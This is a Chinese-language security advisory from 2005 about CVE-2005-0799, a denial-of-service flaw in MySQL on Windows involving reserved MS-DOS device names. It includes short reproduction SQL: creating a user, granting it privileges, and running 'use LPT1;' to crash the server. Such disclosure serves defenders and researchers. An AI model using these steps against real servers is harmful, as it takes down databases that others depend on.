MySQL Server for Windows MS-DOS设备名拒绝服务漏洞
发布日期:2005-03-16
更新日期:2005-03-16
受影响系统:MySQL AB MySQL 5.0.XX
MySQL AB MySQL 4.1.XX
MySQL AB MySQL 4.0.XX
描述:
CVE(CAN) ID:
CVE-2005-0799
MySQL是多用户,多线程的关系数据库管理系统。MySQL数据库服务器是世界上最流行的开放源码数据库之一。
MySQL Server处理包含有保留MS-DOS设备名(AUX,CON,COM1,LPT1和PRN)请求的方式存在漏洞,远程攻击者可能利用此漏洞对主机进行拒绝服务攻击。
攻击者要利用此漏洞必须通过认证并至少具有以下权限之一:
- REFERENCES
- CREATE TEMPORARY TABLES
- GRANT OPTION
- CREATE
- SELECT
这样可以导致服务失败。
<*来源:Luca Ercoli (
luca.ercoli@inwind.it)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=111091250923281&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
1- 创建一个用户帐号:
(connected as 'root')
use mysql;
INSERT INTO user (Host,User,Password) VALUES('%','customer',PASSWORD('customer'));
2- 给予用户上文所述的一个或多个权限:
(connected as 'root')
GRANT CREATE TEMPORARY TABLES ON *.* TO 'customer'@'%';
flush privileges;
3- 使用新帐号连接到服务器并“use”数据库“LPT1”。
(connected as 'customer')
use LPT1;
建议:
厂商补丁:
MySQL AB
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.mysql.com/浏览次数:3435
严重程度:0(网友投票)